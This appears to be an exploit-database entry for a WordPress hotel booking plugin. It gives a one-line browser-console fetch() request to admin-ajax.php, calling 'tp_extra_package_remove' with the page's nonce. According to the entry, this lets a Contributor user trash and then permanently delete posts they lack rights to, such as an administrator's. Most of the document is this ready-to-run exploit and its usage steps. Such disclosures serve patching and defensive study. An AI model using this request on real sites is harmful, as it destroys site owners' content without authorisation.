Share
## https://sploitus.com/exploit?id=WPEX-ID:3061F85E-A70E-49E5-BCCF-AE9240F51178
Run the below command in the developer console of the web browser while being on the blog as a Contributor user. This will put the post with ID 1 in the trash (change this ID to a post the user should not be able to delete, like one created by an admin). Run it again to delete the post

fetch("/wp-admin/admin-ajax.php", {"headers": {"content-type": "application/x-www-form-urlencoded; charset=UTF-8"},"body": 'action=tp_extra_package_remove&package_id=1&nonce=' + hotel_settings['nonce'],"method": "POST"});